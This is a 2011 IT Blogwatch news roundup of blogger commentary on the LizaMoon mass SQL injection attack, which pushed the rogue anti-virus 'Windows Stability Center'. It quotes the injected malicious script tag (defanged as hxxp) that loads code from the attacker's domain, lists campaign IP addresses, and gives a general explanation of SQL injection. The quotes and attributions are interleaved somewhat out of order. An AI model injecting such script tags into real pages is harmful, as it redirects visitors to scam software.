By Richi Jennings
. April 1, 2011. Updated: Literally millions of URLs have been infected with a rampant SQL injection attack. The LizaMoon Windows Stability Center fake anti-virus has even infected the iTunes Music Store... kinda-sorta. In IT Blogwatch, bloggers make like Chicken Licken.
Your humble blogwatcher curated these bloggy bits for your entertainment. Not to mention Angry Nerds: Best April Fools I've seen so far... Websense's Patrik Runald claims to have spotted it first:
The LizaMoon mass-injection is a SQL injection attack that inserts the following line into the code of the page: John Leyden is shocked. Shocked, I tell you:
<script src=hxxp://lizamoon.com/ur.php></script> ... This includes several iTunes URLs. ... The good thing is that iTunes encodes the script tags, which means that the script doesn't execute. ... Good job, Apple.
The Rogue AV software that is installed is called Windows Stability Center. ... [It] displays a warning that there are lots of problems on your PC. ... Very traditional rogue AV scam.
The so-called LizaMoon mass-injection attack uses SQL injection trickery to inject a line of malicious code into compromised pages ... as part of an ambitious attack ... designed to redirect surfers to a site pimping rogue anti-virus packages. Peter Bright explains:
[It] counts as among the most widespread mass-injection attacks on record.
SQL injection attacks ... exploit badly-written Web applications to directly perform actions against databases. ... The underlying cause is a programmer trusting [user] input ... and passing this input directly into the database. ... The database will run code of the attacker's choosing. It's nice to see Dancho Danchev back blogging:
SQL injections following this pattern appear to have been happening ... for six or more months. ... The file nameur.phpand the style of injection remain consistent. ... Previous efforts were on a much smaller scale, however. ... The attacks originated from IP addresses in eastern Europe and Russia.
What's particularly interesting about this campaign, is ... that the used domains are all responding to the same IPs. ... 220.127.116.11 (AS3721); 18.104.22.168 (AS51786); 22.214.171.124 (AS50244). But Chris Nerney grumbles about the date:
The scareware domains have been registered using automatically registered email accounts at Gmail, as a precaution in an attempt to make it harder to expose the campaign by using a single email only.
This really had better not be an April Fool's prank or I'm not going to be happy. ... It's the stupidest day of the year, so we should all be on guard. Meanwhile, the enigmatic rfirth also waxes topical:
The bottom line for users ... is that if they visit one of the sites injected ... they get a scary warning about huge problems on their PC. Fortunately, all that goes away if the ... user pays for a full version of Windows Stability Center! So you've been warned.
Unfortunately, this isn't an April Fools day joke. It's real. And Finally... Angry Nerds: Best April Fools I've seen so far
(add your favorites in the comments below)
Don't miss out on IT Blogwatch:
You can also read Richi's full profile and disclosure of his industry affiliations.
| || ||Richi Jennings is an independent analyst/consultant, specializing in blogging, email, and security. A cross-functional IT geek since 1985, you can follow him as @richi on Twitter, pretend to be richij's friend on Facebook, or just use good old email: firstname.lastname@example.org. |